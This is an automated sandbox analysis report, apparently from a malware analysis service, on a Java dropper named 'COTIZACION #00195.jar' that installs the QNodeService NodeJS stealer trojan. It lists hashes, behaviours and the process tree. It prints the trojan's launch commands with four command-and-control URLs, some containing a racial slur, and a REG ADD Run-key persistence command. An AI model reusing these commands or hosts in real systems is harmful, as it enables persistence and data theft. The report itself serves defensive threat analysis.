Analysis
-
max time kernel
135s -
max time network
149s -
platform
windows10_x64 -
resource
win10 -
submitted
07-07-2020 18:31
Static task
static1
Behavioral task
behavioral1
Sample
COTIZACION #00195.jar
Resource
win7
Behavioral task
behavioral2
Sample
COTIZACION #00195.jar
Resource
win10
General
-
Target
COTIZACION #00195.jar
-
Size
11KB
-
MD5
dea82e5fa24ff713864dab39309766ab
-
SHA1
376db1ce4d3204b0701a21626682772ea8cfa86c
-
SHA256
1e60e23416feac21261eeeaf7e497410744bf5f8618a343e383651068bef1411
-
SHA512
9308b30ccdedbe19cba9e3d22aaf609e4ba2d7d2d8db52b3ff965eab0168bf0d622f007ef1f4cc333e3639304f1d15c7a9723153244acfb244ba4003416dc6cf
Malware Config
Signatures
-
QNodeService
is a trojan written in NodeJS and spread via Java downloader. Utilizes stealer functionality.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 12 wtfismyip.com 11 wtfismyip.com -
Adds Run entry to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\qnodejs-4f9a1ccf = "cmd /D /C \"C:\\Users\\Admin\\qnodejs-node-v13.13.0-win-x64\\qnodejs\\qnodejs-4f9a1ccf.cmd\"" reg.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1576 node.exe 1576 node.exe -
QNodeService NodeJS Trojan 1 IoCs
resource yara_rule behavioral2/files/0x000100000001bfcd-118.dat family_qnodeservice -
Loads dropped DLL 4 IoCs
pid Process 1576 node.exe 1576 node.exe 1576 node.exe 1576 node.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3588 wrote to memory of 396 3588 java.exe 68 PID 3588 wrote to memory of 396 3588 java.exe 68 PID 396 wrote to memory of 1404 396 node.exe 69 PID 396 wrote to memory of 1404 396 node.exe 69 PID 1404 wrote to memory of 1484 1404 cmd.exe 70 PID 1404 wrote to memory of 1484 1404 cmd.exe 70 PID 396 wrote to memory of 1576 396 node.exe 71 PID 396 wrote to memory of 1576 396 node.exe 71 -
Executes dropped EXE 2 IoCs
pid Process 396 node.exe 1576 node.exe
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\COTIZACION #00195.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:3588 -
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js start --group user:[email protected] --register-startup --central-base-url https://coolnigga.linkpc.net --central-base-url https://mynigga.servehttp.com --central-base-url https://coolboy.serveftp.com --central-base-url https://badboy.linkpc.net2⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:396 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-4f9a1ccf" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-4f9a1ccf.cmd\"""3⤵
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-4f9a1ccf" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-4f9a1ccf.cmd\""4⤵
- Adds Run entry to start application
PID:1484
-
-
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js serve start --group user:[email protected] --register-startup --central-base-url https://coolnigga.linkpc.net --central-base-url https://mynigga.servehttp.com --central-base-url https://coolboy.serveftp.com --central-base-url https://badboy.linkpc.net3⤵
- Suspicious behavior: EnumeratesProcesses
- Loads dropped DLL
- Checks processor information in registry
- Executes dropped EXE
PID:1576
-
-